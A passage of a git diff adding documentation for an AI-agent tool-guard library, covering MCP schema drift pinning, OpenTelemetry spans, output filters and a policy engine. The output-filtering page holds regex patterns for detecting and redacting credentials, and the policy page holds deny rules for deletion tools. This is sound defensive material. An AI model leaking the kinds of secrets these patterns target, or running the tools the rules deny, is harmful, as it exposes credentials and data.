was not designed to handle. + +MCP drift detection solves this by pinning a cryptographic fingerprint of each tool schema at a known-good point in time and checking live schemas against those pins at runtime or in CI. 
Any change to the schema produces a different fingerprint and surfaces a structured `McpDriftChange` record with a human-readable remediation message. + +--- + +## Basic Usage + +Pin your tool schemas once at setup time, then check for drift before each agent run: + +```typescript +import { + pinFingerprint, + detectDrift, + FingerprintStore, +} from 'ai-tool-guard/mcp'; + +// 1. Pin schemas when you first approve them. +const store = new FingerprintStore(); + +const fp = await pinFingerprint( + 'readFile', + 'filesystem-server', + myFileReadToolSchema, + 'production', +); +store.set(fp); + +// 2. At runtime, fetch live schemas from the MCP server and check for drift. +const liveSchemas = await fetchSchemasFromMcpServer(); + +const result = await detectDrift(store.getAll(), liveSchemas); + +if (result.drifted) { + for (const change of result.changes) { + console.error(change.remediation); + } + process.exit(1); +} +``` + +--- + +## Configuration Options + +MCP drift detection is a standalone module. It does not require a `ToolGuard` instance. All functions are pure async utilities. + +The `mcpFingerprint` field on `ToolGuardConfig` lets you attach an expected schema hash to a guarded tool so the guard can verify it at execution time: + +```typescript +const tools = guard.guardTools({ + readFile: { + tool: readFileTool, + riskLevel: 'medium', + mcpFingerprint: 'abc123...', // Expected SHA-256 hash + }, +}); +``` + +--- + +## Core Functions + +### `computeFingerprint(toolName, schema): Promise<string>` + +Computes a SHA-256 fingerprint for a tool schema. The schema is canonicalized (object keys sorted recursively) before hashing, so fingerprints are stable regardless of key insertion order. + +```typescript +import { computeFingerprint } from 'ai-tool-guard/mcp'; + +const hash = await computeFingerprint('readFile', { + type: 'object', + properties: { + path: { type: 'string' }, + }, + required: ['path'], +}); +// => "4f3e2a1b..." 
(64-character hex string) +``` + +The input to the hash function is `JSON.stringify({ toolName, schema })` with canonicalized key order. Including `toolName` in the hash means the same schema used under two different tool names produces two different fingerprints. + +### `pinFingerprint(toolName, serverId, schema, environment?): Promise<McpToolFingerprint>` + +Creates a `McpToolFingerprint` record capturing the current schema hash, the time of pinning, and an optional environment tag. + +```typescript +import { pinFingerprint } from 'ai-tool-guard/mcp'; + +const fp: McpToolFingerprint = await pinFingerprint( + 'queryDatabase', + 'db-server-v2', + queryDatabaseSchema, + 'staging', +); +// { +// toolName: 'queryDatabase', +// serverId: 'db-server-v2', +// schemaHash: 'c4f9...', +// pinnedAt: '2024-01-15T10:30:00.000Z', +// environment: 'staging', +// } +``` + +### `detectDrift(pinnedFingerprints, currentSchemas): Promise<McpDriftResult>` + +Compares a set of pinned fingerprints against live schemas. Returns a `McpDriftResult` indicating whether any drift was found and providing details for each changed tool. + +Tools present in `currentSchemas` but absent from `pinnedFingerprints` are also flagged — they are treated as unknown tools that have not been reviewed. + +```typescript +const result = await detectDrift( + store.getAll(), + [ + { toolName: 'readFile', serverId: 'fs-server', schema: liveReadFileSchema }, + { toolName: 'writeFile', serverId: 'fs-server', schema: liveWriteFileSchema }, + ], +); + +console.log(result.drifted); // true | false +console.log(result.changes.length); // number of drifted tools +``` + +--- + +## Data Types + +### `McpToolFingerprint` + +```typescript +interface McpToolFingerprint { + /** Tool name. */ + toolName: string; + /** MCP server identifier. */ + serverId: string; + /** SHA-256 of the canonical schema JSON. */ + schemaHash: string; + /** ISO-8601 timestamp when this fingerprint was pinned. */ + pinnedAt: string; + /** Optional environment tag (e.g. 
"production", "staging"). */ + environment?: string; +} +``` + +### `McpDriftResult` + +```typescript +interface McpDriftResult { + /** True if any tool schemas changed or new unpinned tools appeared. */ + drifted: boolean; + /** Details for each drifted tool. */ + changes: McpDriftChange[]; +} +``` + +### `McpDriftChange` + +```typescript +interface McpDriftChange { + toolName: string; + serverId: string; + /** The hash stored in the pin. "(not pinned)" for new unknown tools. */ + expectedHash: string; + /** The hash computed from the live schema. */ + actualHash: string; + /** Human-readable description of what changed and how to fix it. */ + remediation: string; +} +``` + +The `remediation` string is ready to log or display to a developer. It identifies the server and tool by name, shows the first 12 characters of both hashes for visual comparison, and instructs the developer to call `pinFingerprint()` after reviewing the change. + +--- + +## `FingerprintStore` + +`FingerprintStore` is an in-memory reference implementation for managing pinned fingerprints. For production deployments, use `export()` and `import()` to persist to a file, database, or secret store. + +```typescript +import { FingerprintStore } from 'ai-tool-guard/mcp'; + +const store = new FingerprintStore(); +``` + +### Methods + +| Method | Signature | Description | +|---|---|---| +| `set` | `(fp: McpToolFingerprint) => void` | Adds or replaces a pinned fingerprint. | +| `get` | `(serverId: string, toolName: string) => McpToolFingerprint \| undefined` | Retrieves a single pin by server and tool name. | +| `getAll` | `() => McpToolFingerprint[]` | Returns all pinned fingerprints as an array. | +| `delete` | `(serverId: string, toolName: string) => boolean` | Removes a pin. Returns `true` if it existed. | +| `export` | `() => string` | Serializes all fingerprints to a pretty-printed JSON string. | +| `import` | `(json: string) => void` | Loads fingerprints from a JSON string, validating each entry. 
| + +### Persistence with `export()` and `import()` + +```typescript +import fs from 'node:fs'; + +// Save to disk. +fs.writeFileSync('fingerprints.json', store.export()); + +// Load on next startup. +const stored = new FingerprintStore(); +stored.import(fs.readFileSync('fingerprints.json', 'utf-8')); +``` + +`import()` validates that every entry in the JSON array has non-empty `toolName`, `serverId`, `schemaHash`, and `pinnedAt` string fields. Malformed entries throw an `Error` identifying the index of the invalid entry. + +!!! warning + `FingerprintStore` is an in-memory store. Data is lost when the process exits unless you call `export()` and persist the result. Plan your persistence strategy before deploying. + +--- + +## Advanced Examples + +### CI/CD Schema Validation + +Run drift detection as a pre-deployment check. Fail the pipeline if any tool schema changed since the last pin. + +```typescript +// scripts/check-mcp-drift.ts +import fs from 'node:fs'; +import { FingerprintStore, detectDrift } from 'ai-tool-guard/mcp'; +import { fetchToolSchemas } from './mcp-client.js'; + +const store = new FingerprintStore(); +store.import(fs.readFileSync('fingerprints.json', 'utf-8')); + +const liveSchemas = await fetchToolSchemas(); +const result = await detectDrift(store.getAll(), liveSchemas); + +if (result.drifted) { + console.error('MCP schema drift detected:'); + for (const change of result.changes) { + console.error(` [${change.serverId}] ${change.toolName}`); + console.error(` Expected: ${change.expectedHash.slice(0, 12)}...`); + console.error(` Actual: ${change.actualHash.slice(0, 12)}...`); + console.error(` ${change.remediation}`); + } + process.exit(1); +} + +console.log('All MCP tool schemas match pinned fingerprints.'); +``` + +### Runtime Drift Checking + +Check for drift at agent startup, before any tool calls are made, and block execution if drift is found: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import { FingerprintStore, 
detectDrift } from 'ai-tool-guard/mcp'; +import { fetchToolSchemas } from './mcp-client.js'; + +async function createGuardedAgent() { + const store = new FingerprintStore(); + store.import(loadPersistedFingerprints()); + + const liveSchemas = await fetchToolSchemas(); + const driftResult = await detectDrift(store.getAll(), liveSchemas); + + if (driftResult.drifted) { + throw new Error( + `MCP schema drift detected on ${driftResult.changes.length} tool(s). ` + + `Re-pin schemas after review.` + ); + } + + return createToolGuard({ rules: [...] }); +} +``` + +### Multi-Environment Pinning + +Pin the same tool separately for `production` and `staging` environments, which may expose different schema versions: + +```typescript +import { pinFingerprint, FingerprintStore } from 'ai-tool-guard/mcp'; + +// A store keys on serverId + toolName, so a second `set()` for the same tool +// replaces the first. Keep one store per environment so both pins survive. +const prodStore = new FingerprintStore(); +const stagingStore = new FingerprintStore(); + +// Pin production schema. +prodStore.set(await pinFingerprint('sendEmail', 'email-server', prodSchema, 'production')); + +// Pin staging schema (may differ during a rollout). +stagingStore.set(await pinFingerprint('sendEmail', 'email-server', stagingSchema, 'staging')); + +// Run drift checks against the pins for the environment being verified: +const prodPins = prodStore.getAll(); +``` + +--- + +## How It Works + +1. `computeFingerprint` takes the tool name and schema, wraps them in a deterministic object `{ toolName, schema }`, then passes it through `canonicalize()` — a recursive key-sorting serializer — before computing SHA-256 via the Node `crypto` module. +2. `pinFingerprint` calls `computeFingerprint` and wraps the result in a `McpToolFingerprint` record stamped with the current ISO-8601 time. +3. `detectDrift` builds an internal lookup map keyed on `"${serverId}:${toolName}"`. For each live schema, it looks up the corresponding pin. If the pin is missing, the tool is flagged as unknown. If the pin exists but the hashes differ, the tool is flagged as changed. 
+4. For each mismatch, a `McpDriftChange` is constructed with the expected and actual hashes and a remediation string that includes the pin timestamp for easy auditing. +5. The final `McpDriftResult` sets `drifted: true` if the `changes` array is non-empty. + +--- + +## Related + +- [API Reference — MCP](../api/mcp.md) diff --git a/docs/guides/opentelemetry.md b/docs/guides/opentelemetry.md new file mode 100644 index 0000000..35eea57 --- /dev/null +++ b/docs/guides/opentelemetry.md @@ -0,0 +1,251 @@ +# OpenTelemetry Integration + +## Overview + +ai-tool-guard emits structured OpenTelemetry spans for every significant stage of tool execution: policy evaluation, approval waiting, tool execution, injection detection, rate limiting, and output filtering. Spans are annotated with semantic attributes that map directly to the domain model, making traces immediately useful in tools like Jaeger, Grafana Tempo, or any OTLP-compatible backend. + +OpenTelemetry support is entirely optional. `@opentelemetry/api` is a peer dependency. When it is not installed, the library uses an internal no-op tracer with zero overhead — no exceptions, no warnings, no branching in your application code. + +--- + +## Basic Usage + +Install the peer dependency alongside your OTel SDK setup: + +```bash +npm install @opentelemetry/api +``` + +Enable tracing in `createToolGuard`: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [...], + otel: { + enabled: true, + tracerName: 'my-agent', + defaultAttributes: { + 'service.name': 'my-ai-service', + 'deployment.environment': 'production', + }, + }, +}); +``` + +ai-tool-guard picks up whatever OTel SDK and exporter you have configured globally. The library does not configure exporters itself. + +--- + +## Configuration Options + +The `otel` key in `GuardOptions` accepts an `OtelConfig` object: + +```typescript +export interface OtelConfig { + /** Whether tracing is enabled. 
Default: true when OTel API is available. */ + enabled?: boolean; + /** Custom tracer name registered with the OTel TracerProvider. Default: "ai-tool-guard". */ + tracerName?: string; + /** Additional span attributes merged into every span emitted by the library. */ + defaultAttributes?: Record<string, string | number | boolean>; +} +``` + +| Field | Type | Default | Description | +|---|---|---|---| +| `enabled` | `boolean` | `true` | Set to `false` to force the no-op tracer even when `@opentelemetry/api` is installed. | +| `tracerName` | `string` | `"ai-tool-guard"` | The name passed to `trace.getTracer()`. Appears in span instrumentation scope metadata. | +| `defaultAttributes` | `Record<string, string \| number \| boolean>` | `{}` | Static attributes merged into every span. Useful for service name, environment, tenant ID, etc. | + +--- + +## Span Catalog + +The library emits the following spans. All span names are prefixed with `ai_tool_guard.`. + +| Span Name | When Emitted | Key Attributes | +|---|---|---| +| `ai_tool_guard.policy_eval` | After every policy evaluation, before the verdict is acted on | `tool.name`, `tool.risk_level`, `tool.risk_categories`, `decision.verdict`, `decision.reason`, `decision.matched_rules`, `decision.dry_run` | +| `ai_tool_guard.tool_execute` | Wraps the actual tool `execute()` call | `tool.name` | +| `ai_tool_guard.approval_wait` | Wraps the approval handler call for `require-approval` verdicts | `tool.name`, `approval.token_id`, `approval.approved`, `approval.patched` | +| `ai_tool_guard.injection_check` | When injection detection fires and a suspected injection is detected | `injection.score`, `injection.suspected` | +| `ai_tool_guard.rate_limit` | When a rate limit check rejects a call | `rate_limit.allowed` | +| `ai_tool_guard.output_filter` | When an output filter runs and either redacts or blocks the result | `output.redacted`, `output.blocked` | + +!!! 
note + The `policy_eval` span is set to error status (`SpanStatusCode.ERROR`) when the verdict is `deny`, making denied calls immediately visible in trace UIs without custom queries. + +--- + +## Semantic Attribute Keys + +All attribute keys are available via the exported `ATTR` constant object. Import it to avoid relying on raw strings: + +```typescript +import { ATTR } from 'ai-tool-guard/otel'; +``` + +The full set of 16 attributes: + +| Constant | Attribute Key | Value Type | Description | +|---|---|---|---| +| `ATTR.TOOL_NAME` | `ai_tool_guard.tool.name` | `string` | Name of the guarded tool | +| `ATTR.TOOL_RISK_LEVEL` | `ai_tool_guard.tool.risk_level` | `string` | Evaluated risk level (`low`, `medium`, `high`, `critical`) | +| `ATTR.TOOL_RISK_CATEGORIES` | `ai_tool_guard.tool.risk_categories` | `string` | Comma-separated list of risk categories | +| `ATTR.DECISION_VERDICT` | `ai_tool_guard.decision.verdict` | `string` | `allow`, `deny`, or `require-approval` | +| `ATTR.DECISION_REASON` | `ai_tool_guard.decision.reason` | `string` | Human-readable explanation from the policy engine | +| `ATTR.DECISION_MATCHED_RULES` | `ai_tool_guard.decision.matched_rules` | `string` | Comma-separated matched rule IDs | +| `ATTR.DECISION_DRY_RUN` | `ai_tool_guard.decision.dry_run` | `boolean` | Whether this was a dry-run evaluation | +| `ATTR.APPROVAL_TOKEN_ID` | `ai_tool_guard.approval.token_id` | `string` | Approval token ID for correlation | +| `ATTR.APPROVAL_APPROVED` | `ai_tool_guard.approval.approved` | `boolean` | Whether the approval was granted | +| `ATTR.APPROVAL_PATCHED` | `ai_tool_guard.approval.patched` | `boolean` | Whether arguments were patched during approval | +| `ATTR.INJECTION_SCORE` | `ai_tool_guard.injection.score` | `number` | Suspicion score from 0 to 1 | +| `ATTR.INJECTION_SUSPECTED` | `ai_tool_guard.injection.suspected` | `boolean` | Whether a prompt injection was detected | +| `ATTR.RATE_LIMIT_ALLOWED` | `ai_tool_guard.rate_limit.allowed` | `boolean` 
| Whether the call was within rate limits | +| `ATTR.OUTPUT_REDACTED` | `ai_tool_guard.output.redacted` | `boolean` | Whether output fields were redacted | +| `ATTR.OUTPUT_BLOCKED` | `ai_tool_guard.output.blocked` | `boolean` | Whether the output was blocked entirely | +| `ATTR.MCP_DRIFT_DETECTED` | `ai_tool_guard.mcp.drift_detected` | `boolean` | Whether MCP schema drift was detected | + +--- + +## Span Helper Functions + +The following functions are exported from the tracing module for cases where you need to integrate with custom instrumentation. + +### `createTracer(config?: OtelConfig): Tracer` + +Attempts a dynamic `require('@opentelemetry/api')` using Node's `createRequire` for ESM compatibility. Returns the real OTel tracer if the package is available, or a no-op tracer otherwise. The result is cached after the first call for the same `tracerName`. + +```typescript +import { createTracer } from 'ai-tool-guard/otel'; + +const tracer = createTracer({ tracerName: 'my-component' }); +const span = tracer.startSpan('my.operation'); +// ... do work ... +span.end(); +``` + +### `spanFromDecision(tracer, record, config?): Span` + +Creates an `ai_tool_guard.policy_eval` span populated from a `DecisionRecord`. The span status is set to ERROR when `record.verdict === 'deny'`. The caller is responsible for calling `.end()` on the returned span. + +### `startToolExecutionSpan(tracer, toolName, config?): Span` + +Creates an `ai_tool_guard.tool_execute` span for the given tool name. `defaultAttributes` from the config are merged in. Call `.end()` after the tool completes. + +### `startApprovalSpan(tracer, toolName, tokenId, config?): Span` + +Creates an `ai_tool_guard.approval_wait` span scoped to a specific token ID. Useful for measuring how long a human approval interaction takes. + +--- + +## No-Op Behavior + +When `@opentelemetry/api` is not installed, all tracing calls resolve to internal `NoopSpan` and `NoopTracer` instances whose methods are empty functions. 
There is no `try/catch` in the hot path — the import attempt happens once at guard construction time and the result is cached. + +Setting `otel: { enabled: false }` explicitly forces the no-op tracer regardless of whether the package is installed. Use this in unit tests to eliminate any OTel initialization side effects. + +!!! tip + You do not need to guard OTel calls with `if (otelEnabled)` checks in your application code. The no-op tracer makes the same public interface available at zero cost. + +--- + +## Advanced Examples + +### Connecting to Jaeger + +Configure the OTel Node SDK with an OTLP HTTP exporter before creating the guard. ai-tool-guard picks up the registered `TracerProvider` automatically. + +```typescript +import { NodeSDK } from '@opentelemetry/sdk-node'; +import { OTLPTraceExporter } from '@opentelemetry/exporter-trace-otlp-http'; +import { createToolGuard } from 'ai-tool-guard'; + +const sdk = new NodeSDK({ + serviceName: 'my-ai-service', + traceExporter: new OTLPTraceExporter({ + url: 'http://localhost:4318/v1/traces', + }), +}); + +sdk.start(); + +const guard = createToolGuard({ + rules: [...], + otel: { + enabled: true, + tracerName: 'my-ai-service', + defaultAttributes: { + 'deployment.environment': 'production', + }, + }, +}); +``` + +### Custom Span Enrichment via `onDecision` + +Use `onDecision` alongside `createTracer` to add application-specific attributes to child spans that the library does not produce by default: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import { createTracer, ATTR } from 'ai-tool-guard/otel'; + +const tracer = createTracer({ tracerName: 'my-app-enrichment' }); + +const guard = createToolGuard({ + rules: [...], + otel: { enabled: true }, + onDecision: (record) => { + const span = tracer.startSpan('my_app.tool_decision', { + attributes: { + [ATTR.TOOL_NAME]: record.toolName, + [ATTR.DECISION_VERDICT]: record.verdict, + // Application-specific attributes beyond the default set. 
+ 'my_app.tenant_id': String(record.attributes['tenantId'] ?? 'unknown'), + 'my_app.eval_ms': record.evalDurationMs, + }, + }); + span.end(); + }, +}); +``` + +### Multi-Tenant Attribute Injection + +Use `defaultAttributes` with a per-request guard factory to attach tenant context to every span: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +function createTenantGuard(tenantId: string) { + return createToolGuard({ + rules: [...], + otel: { + enabled: true, + defaultAttributes: { + 'tenant.id': tenantId, + 'service.name': 'ai-service', + }, + }, + }); +} +``` + +--- + +## How It Works + +1. `createToolGuard` calls `createTracer(options.otel)`, which attempts `require('@opentelemetry/api')` once using `createRequire(import.meta.url)` for ESM/CJS compatibility, then caches the result. +2. During each tool invocation, the guard's internal pipeline calls the span helper functions at the appropriate stage. +3. Each helper opens a span with pre-populated attributes drawn from the `DecisionRecord` or the current tool call context, merging in `defaultAttributes` if configured. +4. Spans are ended immediately after their stage completes. The `tool_execute` span wraps the actual `execute()` call inside a `try/finally` block so it closes even on error. +5. The OTel SDK propagates spans to the configured exporter via its background batch processor, with no synchronous I/O in the hot path. + +--- + +## Related + +- [API Reference — OTel](../api/otel.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/output-filtering.md b/docs/guides/output-filtering.md new file mode 100644 index 0000000..b9d9e1e --- /dev/null +++ b/docs/guides/output-filtering.md @@ -0,0 +1,268 @@ +# Output Filtering + +Output filters run after a tool executes and before the result is returned to the model. They give you egress control over what the model sees: secrets can be redacted, PII can be removed, and specific categories of output can be blocked entirely. 
Filters compose into a chain, each receiving the output of the previous one. + +## Overview + +Register filters via the `outputFilters` array on `ToolGuardConfig`. The chain runs in declaration order. Each filter can return one of three verdicts: + +- **`pass`** — Output is clean; pass it to the next filter unchanged (or return it if this is the last filter). +- **`redact`** — Output was modified; the transformed output continues through the chain. +- **`block`** — Output is suppressed entirely. Execution short-circuits; no further filters run. + +Redacted field names are accumulated across all filters and recorded in the `DecisionRecord.redactions` array for audit purposes. + +## Basic Usage + +```typescript +import { createToolGuard } from "ai-tool-guard"; +import { piiOutputFilter, secretsFilter } from "ai-tool-guard/guards"; + +const guard = createToolGuard(); + +const wrappedUserLookup = guard.guardTool("userLookup", userLookupTool, { + riskLevel: "high", + riskCategories: ["data-read", "pii"], + outputFilters: [ + secretsFilter(), // Strip secrets first. + piiOutputFilter(), // Then strip remaining PII. + ], +}); +``` + +## Configuration Options + +### `secretsFilter(extraRules?)` + +Redacts common secrets from string output using pattern matching. The built-in rules cover the most prevalent secret formats: + +| Rule Name | Pattern | +|---|---| +| `aws-key` | `AKIA...` and `ASIA...` IAM key prefixes (20-char) | +| `github-token` | `ghp_`, `gho_`, `ghu_`, `ghs_`, `ghr_` tokens | +| `jwt` | Three-segment base64url JWT (`eyJ...`) | +| `generic-api-key` | `api_key`, `apikey`, `secret_key` assignments with long values | +| `bearer-token` | `Bearer <token>` authorization headers | +| `private-key` | PEM-encoded RSA and EC private key blocks | + +Matched content is replaced with `[REDACTED]` by default. 
+ +```typescript +import { secretsFilter } from "ai-tool-guard/guards"; +import type { RedactionRule } from "ai-tool-guard/guards"; + +// Use with no arguments for default rules only. +secretsFilter(); + +// Extend with project-specific secret patterns. +const customRule: RedactionRule = { + name: "stripe-key", + pattern: /sk_(live|test)_[A-Za-z0-9]{24,}/g, + replacement: "[STRIPE KEY REDACTED]", +}; +secretsFilter([customRule]); +``` + +### `piiOutputFilter(opts?)` + +Redacts PII from string output. By default all four PII types are active. Pass `allowedTypes` to suppress redaction for specific types. + +| Type | Replacement | +|---|---| +| `email` | `[EMAIL REDACTED]` | +| `ssn` | `[SSN REDACTED]` | +| `phone` | `[PHONE REDACTED]` | +| `credit-card` | `[CARD REDACTED]` (Luhn-validated matches only) | + +```typescript +import { piiOutputFilter } from "ai-tool-guard/guards"; + +// Redact all PII types. +piiOutputFilter(); + +// Allow emails through but redact everything else. +piiOutputFilter({ allowedTypes: ["email"] }); +``` + +Credit card redaction uses Luhn validation to confirm a match is a real card number before redacting it. This prevents over-redaction of numeric strings that pattern-match but are not valid card numbers. + +### `customFilter(name, fn)` + +Create a filter from any function. Use this for domain-specific logic, content classification, size limiting, or any check that the built-in filters do not cover. 
+ +```typescript +import { customFilter } from "ai-tool-guard/guards"; +import type { OutputFilterResult, PolicyContext } from "ai-tool-guard"; + +const sizeLimitFilter = customFilter( + "size-limit", + async (result: unknown, ctx: PolicyContext): Promise<OutputFilterResult> => { + const serialized = JSON.stringify(result); + if (serialized.length > 100_000) { + return { verdict: "block", output: null }; + } + return { verdict: "pass", output: result }; + }, +); +``` + +The function signature is: + +```typescript +fn(result: unknown, ctx: PolicyContext): Promise<OutputFilterResult> +``` + +`ctx` gives you access to `toolName`, `args`, `userAttributes`, and conversation context — useful for applying different redaction rules based on the caller's role or the tool being called. + +### `runOutputFilters(filters, result, ctx)` + +The chain runner. Typically called internally by the guard engine, but exposed for testing and custom integration: + +```typescript +import { runOutputFilters } from "ai-tool-guard/guards"; + +const chainResult = await runOutputFilters( + [secretsFilter(), piiOutputFilter()], + rawToolOutput, + ctx, +); + +// chainResult.output — final (possibly redacted) value +// chainResult.redactedFields — e.g. ["secrets-filter:aws-key", "pii-output-filter:email"] +// chainResult.blocked — true if any filter returned "block" +// chainResult.blockedBy — name of the filter that blocked (if blocked) +``` + +## `OutputFilterResult` + +Each filter returns: + +```typescript +interface OutputFilterResult { + verdict: "pass" | "redact" | "block"; + output: unknown; // The (possibly transformed) value. + redactedFields?: string[]; // Names of redacted patterns. +} +``` + +When the chain completes, `runOutputFilters` returns an `OutputFilterChainResult`: + +```typescript +interface OutputFilterChainResult { + output: unknown; + redactedFields: string[]; // Prefixed with filter name: "secrets-filter:aws-key". + blocked: boolean; + blockedBy?: string; // Filter name, if blocked. 
+} +``` + +## Redaction Mechanics + +The internal `redactValue` function applies rules recursively across the full output structure: + +- **Strings** — each pattern is tested and matched substrings are replaced in-place. +- **Arrays** — each element is processed independently and recursively. +- **Objects** — each property value is processed recursively; keys are not inspected. +- **Other types** — numbers, booleans, and `null` pass through unchanged. + +For rules with a `validate` function (currently credit-card Luhn validation), a replacer function is used so that each regex match is individually validated before replacement. Only matches that pass validation are redacted. + +!!! note "Global flag required for pattern rules" + Patterns used in `SecretRule` and the built-in PII rules are compiled with the `g` (global) flag. If you supply custom `RedactionRule` patterns without the `g` flag, only the first match per string will be replaced. Always use `g` in `RedactionRule.pattern`. + +## Advanced Examples + +### Blocking Output Above a Size Threshold + +Prevent large tool results from being fed back to the model, which could exhaust context or be used for exfiltration: + +```typescript +import { createToolGuard } from "ai-tool-guard"; +import { customFilter, secretsFilter } from "ai-tool-guard/guards"; + +const guard = createToolGuard(); + +const wrappedFileTool = guard.guardTool("readFile", readFileTool, { + riskLevel: "medium", + outputFilters: [ + secretsFilter(), + customFilter("size-guard", async (result) => { + const size = JSON.stringify(result).length; + if (size > 50_000) { + return { + verdict: "block", + output: null, + // blockedBy will be set to "size-guard" in the chain result. 
+ }; + } + return { verdict: "pass", output: result }; + }), + ], +}); +``` + +### Domain-Specific Redaction with Custom Rules + +Extend `secretsFilter` with patterns specific to your infrastructure: + +```typescript +import { secretsFilter } from "ai-tool-guard/guards"; +import type { RedactionRule } from "ai-tool-guard/guards"; + +const internalTokenRule: RedactionRule = { + name: "internal-service-token", + pattern: /svc_[A-Za-z0-9]{32}/g, + replacement: "[SERVICE TOKEN REDACTED]", +}; + +const dbConnectionStringRule: RedactionRule = { + name: "db-connection-string", + pattern: /postgresql:\/\/[^\s"']+/g, + replacement: "[DB URL REDACTED]", +}; + +const filter = secretsFilter([internalTokenRule, dbConnectionStringRule]); +``` + +### Role-Based Redaction with a Custom Filter + +Use `ctx.userAttributes` to apply different redaction based on who is calling: + +```typescript +import { customFilter } from "ai-tool-guard/guards"; + +const roleBasedPiiFilter = customFilter( + "role-based-pii", + async (result, ctx) => { + const role = ctx.userAttributes.role as string | undefined; + if (role === "admin") { + // Admins see the raw output. + return { verdict: "pass", output: result }; + } + // All other roles get PII stripped. + const { piiOutputFilter, runOutputFilters } = await import("ai-tool-guard/guards"); + const inner = await runOutputFilters([piiOutputFilter()], result, ctx); + return { + verdict: inner.redactedFields.length > 0 ? "redact" : "pass", + output: inner.output, + redactedFields: inner.redactedFields, + }; + }, +); +``` + +## How It Works + +1. After a tool executes successfully, the guard engine calls `runOutputFilters(filters, rawResult, ctx)`. +2. The runner iterates over `filters` in order, passing the current output to each `filter.filter(current, ctx)`. +3. If a filter returns `verdict: "block"`, the runner immediately returns `{ output: null, blocked: true, blockedBy: filter.name }`. No further filters run. +4. 
If a filter returns `verdict: "redact"`, its `output` becomes the input for the next filter and its `redactedFields` are prefixed with the filter name and appended to `allRedacted`. +5. If a filter returns `verdict: "pass"`, its `output` (unchanged or transformed) becomes the input for the next filter. +6. After all filters complete, the final `output` is returned to the caller and `allRedacted` is written to `DecisionRecord.redactions`. + +## Related + +- [API Reference — Guards](../api/guards.md) +- [Argument Validation](argument-validation.md) +- [Decision Records](decision-records.md) +- [Injection Detection](injection-detection.md) diff --git a/docs/guides/policy-engine.md b/docs/guides/policy-engine.md new file mode 100644 index 0000000..faabb3f --- /dev/null +++ b/docs/guides/policy-engine.md @@ -0,0 +1,227 @@ +# Policy Engine + +The policy engine is the core decision-making component of `ai-tool-guard`. It evaluates every tool call against a set of rules and an optional external backend, producing a `DecisionRecord` that explains why a call was allowed, denied, or sent for approval. + +## Overview + +When a guarded tool is invoked, the engine runs the following pipeline: + +1. Resolve the tool's `riskLevel` (from per-tool config or `defaultRiskLevel`). +2. If a `PolicyBackend` is configured, delegate to it first. +3. Evaluate the built-in `PolicyRule` list in priority order. +4. Merge results using escalation semantics: `deny` > `require-approval` > `allow`. +5. Return a `DecisionRecord` capturing the verdict, matched rules, duration, and reason. + +The default verdict when no rule matches is `"allow"`. 
+ +## Basic Usage + +Pass an array of `PolicyRule` objects (or use a preset such as `defaultPolicy()`) when creating your guard: + +```ts +import { createToolGuard, defaultPolicy } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: defaultPolicy(), + onDecision: (record) => { + console.log(`[${record.verdict}] ${record.toolName} — ${record.reason}`); + }, +}); +``` + +Rules can also be written by hand: + +```ts +import { createToolGuard } from "ai-tool-guard"; +import type { PolicyRule } from "ai-tool-guard"; + +const rules: PolicyRule[] = [ + { + id: "deny-delete-tools", + description: "Block all deletion tools unconditionally.", + toolPatterns: ["*delete*", "*remove*", "*drop*"], + verdict: "deny", + priority: 100, + }, + { + id: "allow-reads", + description: "Allow all read-only tools.", + toolPatterns: ["read*", "get*", "list*", "search*"], + verdict: "allow", + priority: 10, + }, +]; + +const guard = createToolGuard({ rules }); +``` + +## Configuration Options + +### `PolicyRule` + +| Property | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Stable identifier included in `DecisionRecord.matchedRules`. | +| `toolPatterns` | `string[]` | Yes | Glob patterns matched against the tool name. | +| `verdict` | `DecisionVerdict` | Yes | One of `"allow"`, `"deny"`, or `"require-approval"`. | +| `riskLevels` | `RiskLevel[]` | No | When set, the rule only applies to tools at these risk levels. | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise<boolean>` | No | Predicate for attribute- or context-based matching. Supports async. | +| `priority` | `number` | No | Evaluation order. Higher values are evaluated first. Default `0`. | +| `description` | `string` | No | Human-readable description recorded in `DecisionRecord.reason`. | + +### Glob Pattern Matching + +Tool names are matched against each pattern in `toolPatterns` using a minimal glob matcher. The pattern is anchored at both ends. 
+ +| Wildcard | Matches | +|---|---| +| `*` | Any sequence of characters, including the empty string. | +| `?` | Exactly one character. | + +```ts +"*" // matches every tool name +"db.*" // matches "db.query", "db.insert", "db.delete" +"read*" // matches "readFile", "readStream" but not "canRead" +"*File" // matches "readFile", "writeFile", "deleteFile" +"get?sers" // matches "getUsers"; the ? substitutes exactly one character +``` + +!!! tip "Dot characters are literal" + The dot (`.`) in a glob pattern matches a literal dot, not any character. Use `db.*` to match namespaced tool names such as `db.query` without matching `dbquery`. + +### Risk Level Filtering + +When `riskLevels` is set on a rule, the rule is skipped for tools that do not match one of the listed levels: + +```ts +const rules: PolicyRule[] = [ + { + id: "approve-medium-risk", + toolPatterns: ["*"], + riskLevels: ["medium"], + verdict: "require-approval", + priority: 0, + }, +]; +``` + +If `riskLevels` is omitted, the rule applies to tools at any risk level. + +### Priority and Escalation + +Rules are sorted by `priority` in descending order before evaluation. All matching rules are collected, and the most restrictive verdict wins across all matches: + +``` +deny > require-approval > allow +``` + +A high-priority `allow` rule does **not** suppress a lower-priority `deny` rule if both match. The engine accumulates every match and selects the strictest outcome. + +!!! info "All matched rules are recorded" + `DecisionRecord.matchedRules` lists every rule that matched, not only the one that determined the final verdict. This gives you a complete audit trail even when escalation occurs across multiple rules. 
